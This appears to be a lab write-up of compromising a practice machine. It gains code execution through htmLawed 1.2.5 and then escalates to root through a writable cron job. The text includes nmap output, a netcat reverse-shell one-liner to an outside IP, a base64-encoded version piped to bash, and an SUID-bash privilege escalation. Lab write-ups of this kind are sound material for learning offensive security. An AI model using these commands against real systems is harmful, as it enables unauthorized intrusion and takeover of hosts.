root💀n16hth4wk-sec:~#

Hack Enumerate Harder!. Eat. Sleep. Repeat.

View on GitHub

First enumeration with nmap

# Nmap 7.94SVN scan initiated Tue Feb 20 14:22:09 2024 as: nmap -sC -sV -T4 -oN service.nmap -p 22,80 -Pn 192.168.239.190
Nmap scan report for 192.168.239.190
Host is up (0.27s latency).

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.4p1 Debian 5+deb11u1 (protocol 2.0)
| ssh-hostkey: 
|   3072 c9:c3:da:15:28:3b:f1:f8:9a:36:df:4d:36:6b:a7:44 (RSA)
|   256 26:03:2b:f6:da:90:1d:1b:ec:8d:8f:8d:1e:7e:3d:6b (ECDSA)
|_  256 fb:43:b2:b0:19:2f:d3:f6:bc:aa:60:67:ab:c1:af:37 (ED25519)
80/tcp open  http    Apache httpd 2.4.56 ((Debian))
|_http-server-header: Apache/2.4.56 (Debian)
|_http-title: htmLawed (1.2.5) test
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Tue Feb 20 14:22:25 2024 -- 1 IP address (1 host up) scanned in 16.09 seconds

image

a web server is runing on port 80 opening it on a browser, we can see it is running htmlawed 1.2.5.

image

after some research found out that it is vuln to RCE by abusing some functions in the settings.

image

intercept with burp and forward.

image

we triggered RCE. now let’s get a reverse shell

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2>&1|nc 192.168.45.212 80 >/tmp/f

#base64 encode
cm0gL3RtcC9mO21rZmlmbyAvdG1wL2Y7Y2F0IC90bXAvZnxzaCAtaSAyPiYxfG5jIDE5Mi4xNjguNDUuMjEyIDgwID4vdG1wL2Y=

echo cm0gL3RtcC9mO21rZmlmbyAvdG1wL2Y7Y2F0IC90bXAvZnxzaCAtaSAyPiYxfG5jIDE5Mi4xNjguNDUuMjEyIDgwID4vdG1wL2Y= | base64 -d|bash

image

proccess the payload and check ncat listener

image

we got a reverse shell.

Privilege Escalation

image

running pspy on the target, we can see a cron job running as root.

image

checking the content of the file, we can see we have permission to write to the file, so we put in an suid creation payload in the file and wait for the cron job to trigger it.

www-data@law:/tmp$ ls -al /bin/bash
-rwxr-xr-x 1 root root 1234376 Mar 27  2022 /bin/bash
www-data@law:/tmp$ ls -al /bin/bash
-rwsr-sr-x 1 root root 1234376 Mar 27  2022 /bin/bash
www-data@law:/tmp$ ls -al /bin/bash -p 
-rwsr-sr-x 1 root root 1234376 Mar 27  2022 /bin/bash
www-data@law:/tmp$ /bin/bash -p 
bash-5.1# whoami 
root
bash-5.1#

we got suid /bin/bash and ran the command to spawn a root shell.

image

and we are through 🙂